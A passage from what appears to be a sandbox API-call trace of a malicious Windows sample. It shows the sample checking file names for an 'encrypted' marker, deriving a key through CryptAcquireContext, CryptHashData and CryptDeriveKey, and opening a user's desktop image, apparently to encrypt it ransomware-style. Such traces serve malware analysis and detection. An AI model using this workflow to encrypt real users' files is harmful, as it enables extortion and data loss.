dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="33uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.193] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.193] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0031.193] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0031.193] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.193] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.194] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.194] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.194] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.194] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.194] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34de5420, ftCreationTime.dwHighDateTime=0x1d5c30b, ftLastAccessTime.dwLowDateTime=0xa6fb2b30, ftLastAccessTime.dwHighDateTime=0x1d5ba0c, ftLastWriteTime.dwLowDateTime=0xa6fb2b30, ftLastWriteTime.dwHighDateTime=0x1d5ba0c, nFileSizeHigh=0x0, nFileSizeLow=0x1710f, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="jJp_bFL.jpg", cAlternateFileName="")) returned 0x7c2240 [0031.194] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0031.194] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.194] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.194] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.194] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.194] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0031.194] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.194] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0031.194] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.194] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.194] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0031.194] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.194] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.195] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.195] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.195] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.195] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0031.195] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.195] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0031.196] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.196] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.196] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0031.196] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.196] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.196] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.196] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.196] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.196] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.196] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.196] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.196] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.196] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.196] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.196] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.196] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0031.196] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.196] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.196] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.196] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.196] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.196] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0031.196] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.197] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.197] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.197] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.197] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.197] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.197] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.197] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.197] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.197] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.197] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.197] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.197] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.197] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0031.197] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.197] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.197] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.197] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.197] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0031.197] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.197] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.197] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.197] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.197] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.198] CryptHashData (hHash=0x7c2100, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0031.198] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.198] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.198] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.198] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.198] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.198] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.198] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.198] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.198] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0031.198] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.198] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.198] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.198] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.198] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.198] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.198] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0031.198] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.198] CryptDestroyHash (hHash=0x7c2100) returned 1 [0031.198] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.198] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.198] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.198] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.199] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.199] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\jjp_bfl.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0031.199] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.199] SetFilePointerEx (in: hFile=0x128, 